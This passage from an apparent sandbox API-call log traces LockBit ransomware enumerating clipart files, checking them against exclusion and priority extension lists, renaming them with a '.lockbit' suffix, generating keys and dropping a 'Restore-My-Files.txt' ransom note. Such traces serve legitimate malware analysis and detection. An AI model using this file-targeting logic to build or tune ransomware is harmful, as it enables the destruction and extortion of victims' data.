[0161.990] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.990] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.991] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.991] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.991] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00487_.WMF.lockbit") returned 72 [0161.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00487_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00487_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.993] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.993] malloc (_Size=0x40068) returned 0x3df0008 [0161.993] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3088) returned 1 [0161.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.994] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.994] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00487_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00487_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.000] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.000] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0162.000] free (_Block=0x1fa2ed8) [0162.000] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00487_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.000] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.000] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x955a5a00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x955a5a00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x938, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00494_.WMF", cAlternateFileName="")) returned 1 [0162.000] lstrcmpiW (lpString1=".", lpString2="NA00494_.WMF") returned -1 [0162.000] lstrcmpiW (lpString1="..", lpString2="NA00494_.WMF") returned -1 [0162.000] PathFindExtensionW (pszPath="NA00494_.WMF") returned=".WMF" [0162.000] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.000] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.000] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.000] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.000] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.000] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.000] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.001] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.001] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00494_.WMF") returned 1 [0162.002] lstrcmpiW (lpString1="ntldr", lpString2="NA00494_.WMF") returned 1 [0162.002] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00494_.WMF") returned 1 [0162.002] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00494_.WMF") returned -1 [0162.002] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00494_.WMF") returned -1 [0162.002] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00494_.WMF") returned 1 [0162.002] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00494_.WMF") returned -1 [0162.002] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.002] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00494_.WMF") returned=".WMF" [0162.002] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.002] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.002] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.003] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.003] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00494_.WMF.lockbit") returned 72 [0162.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00494_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00494_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.005] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.005] malloc (_Size=0x40068) returned 0x3df0008 [0162.005] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2360) returned 1 [0162.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.006] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.006] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.012] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00494_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00494_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.012] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.012] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0162.012] free (_Block=0x1fa2ed8) [0162.012] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00494_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.012] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.012] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bf33f00, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bf33f00, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00512_.WMF", cAlternateFileName="")) returned 1 [0162.012] lstrcmpiW (lpString1=".", lpString2="NA00512_.WMF") returned -1 [0162.012] lstrcmpiW (lpString1="..", lpString2="NA00512_.WMF") returned -1 [0162.012] PathFindExtensionW (pszPath="NA00512_.WMF") returned=".WMF" [0162.013] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.013] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.014] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.014] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00512_.WMF") returned 1 [0162.014] lstrcmpiW (lpString1="ntldr", lpString2="NA00512_.WMF") returned 1 [0162.014] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00512_.WMF") returned 1 [0162.014] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00512_.WMF") returned -1 [0162.014] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00512_.WMF") returned -1 [0162.014] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00512_.WMF") returned 1 [0162.014] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00512_.WMF") returned -1 [0162.015] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.015] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00512_.WMF") returned=".WMF" [0162.015] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.015] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.015] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.016] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.016] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.016] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.016] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.016] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00512_.WMF.lockbit") returned 72 [0162.016] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00512_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00512_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.017] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.017] malloc (_Size=0x40068) returned 0x3df0008 [0162.017] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2912) returned 1 [0162.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.018] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.018] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.024] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00512_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00512_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.024] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.024] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0162.024] free (_Block=0x1fa2ed8) [0162.024] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00512_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.024] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.024] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc9b2c00, ftCreationTime.dwHighDateTime=0x1bd4b20, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcc9b2c00, ftLastWriteTime.dwHighDateTime=0x1bd4b20, nFileSizeHigh=0x0, nFileSizeLow=0x6efa, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00523_.WMF", cAlternateFileName="")) returned 1 [0162.024] lstrcmpiW (lpString1=".", lpString2="NA00523_.WMF") returned -1 [0162.024] lstrcmpiW (lpString1="..", lpString2="NA00523_.WMF") returned -1 [0162.024] PathFindExtensionW (pszPath="NA00523_.WMF") returned=".WMF" [0162.024] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.024] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.024] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.024] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.024] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.024] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.024] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.025] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned 